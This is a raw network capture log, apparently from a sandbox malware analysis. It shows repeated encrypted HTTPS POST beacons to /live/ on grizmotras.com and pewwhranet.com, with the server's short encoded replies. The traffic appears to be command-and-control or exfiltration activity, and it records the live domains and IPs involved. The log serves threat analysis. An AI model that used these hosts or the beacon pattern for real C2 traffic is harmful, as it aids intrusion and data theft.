                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: pewwhranet.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:22:37 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 41 38 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4c 79 2b 64 30 39 4d 79 53 49 68 74 78 75 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RoA8nRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsLy+d09MySIhtxuVHHuW


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                94192.168.2.549817172.67.219.28443
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:22:42 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:22:42 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 41 38 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 75 70 61 55 4a 4a 31 44 63 39 73 78 79 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RoA8nRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                95192.168.2.549818104.21.84.207443
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:22:46 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: pewwhranet.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:22:46 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 41 38 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4c 79 2b 64 30 39 4d 79 53 49 68 74 78 75 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RoA8nRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsLy+d09MySIhtxuVHHuW


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                96192.168.2.549819172.67.219.28443
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:22:50 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:22:50 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 41 38 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 75 70 61 55 4a 4a 31 44 63 39 73 78 79 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RoA8nRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                97192.168.2.549820104.21.84.207443
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:22:55 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: pewwhranet.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:22:55 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 41 38 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4c 79 2b 64 30 39 4d 79 53 49 68 74 78 75 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RoA8nRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsLy+d09MySIhtxuVHHuW


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                98192.168.2.549821172.67.219.28443
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:22:59 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:22:59 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 41 38 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 75 70 61 55 4a 4a 31 44 63 39 73 78 79 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RoA8nRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                99192.168.2.549822104.21.84.207443
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:23:03 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: pewwhranet.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:23:03 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 41 38 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4c 79 2b 64 30 39 4d 79 53 49 68 74 78 75 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RoA8nRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsLy+d09MySIhtxuVHHuW


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                100192.168.2.549823172.67.219.28443
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:23:07 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:23:07 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 41 38 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 75 70 61 55 4a 4a 31 44 63 39 73 78 79 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RoA8nRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW
                                                                                                2024-04-26 21:23:11 UTC580INHTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:23:11 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6bG0yyh%2FF9bYUy90bVP9XYKsYe59iDg5lEEUFfTVgkGy6lbfHHcYd8LEGulzgU2Y%2Futy%2BHwXoBtnDWLJ96%2FhjJMPtdzCgHe9lRTI3wDiMBuDGzcNALznpJcd%2FARziadCIQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a9a1d81d36b3b6-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:23:11 UTC118INData Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a
                                                                                                Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
                                                                                                2024-04-26 21:23:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                101192.168.2.549824172.67.219.28443
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:23:12 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:23:12 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 41 73 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 75 70 61 55 4a 4a 31 44 63 39 73 78 79 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RoAsnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW
                                                                                                2024-04-26 21:23:16 UTC578INHTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:23:15 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zl0ytf48F5sj8ZdeOJg3tbGSNPqXT%2FN0AZrJgjXaRJgxI8KCQhzi%2BPGSc%2FfP3dk%2FVAS6EwBkNP6vFcbwwpWfM8iVMJldJciO4six8L2knP89g9U1C2V6iAykmyRzCjamLg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a9a1f32ce8b3bb-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:23:16 UTC118INData Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a
                                                                                                Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
                                                                                                2024-04-26 21:23:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                102192.168.2.549825172.67.219.28443
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:23:16 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:23:16 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 44 63 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 75 70 61 55 4a 4a 31 44 63 39 73 78 79 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RoDcnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                103192.168.2.549826104.21.84.207443
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:23:20 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: pewwhranet.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:23:20 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 44 63 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4c 79 2b 64 30 39 4d 79 53 49 68 74 78 75 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RoDcnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsLy+d09MySIhtxuVHHuW


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                104192.168.2.549827104.21.59.82443
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:23:25 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:23:25 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 44 63 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 75 70 61 55 4a 4a 31 44 63 39 73 78 79 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RoDcnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                105192.168.2.549828104.21.84.207443
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:23:29 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: pewwhranet.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:23:29 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 44 63 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4c 79 2b 64 30 39 4d 79 53 49 68 74 78 75 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RoDcnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsLy+d09MySIhtxuVHHuW


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                106192.168.2.549829104.21.59.82443
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:23:33 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:23:33 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 44 63 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 75 70 61 55 4a 4a 31 44 63 39 73 78 79 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RoDcnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW
                                                                                                2024-04-26 21:23:37 UTC578INHTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:23:37 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FolGzqUExnXI9hHwPuNboqG8I1mKCbK2AKMd03T8LHdyDr3420y5zdGYrB99964nuERtARoNhCTnymPqx%2FVCrsms%2BBvz21fRZCjpR1G%2BPm0qkGXoYm9Dn5tKepLtggSrzQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a9a27889d4748e-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:23:37 UTC118INData Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a
                                                                                                Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
                                                                                                2024-04-26 21:23:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                107192.168.2.549830104.21.59.82443
                                                                                                TimestampBytes transferredDirectionData
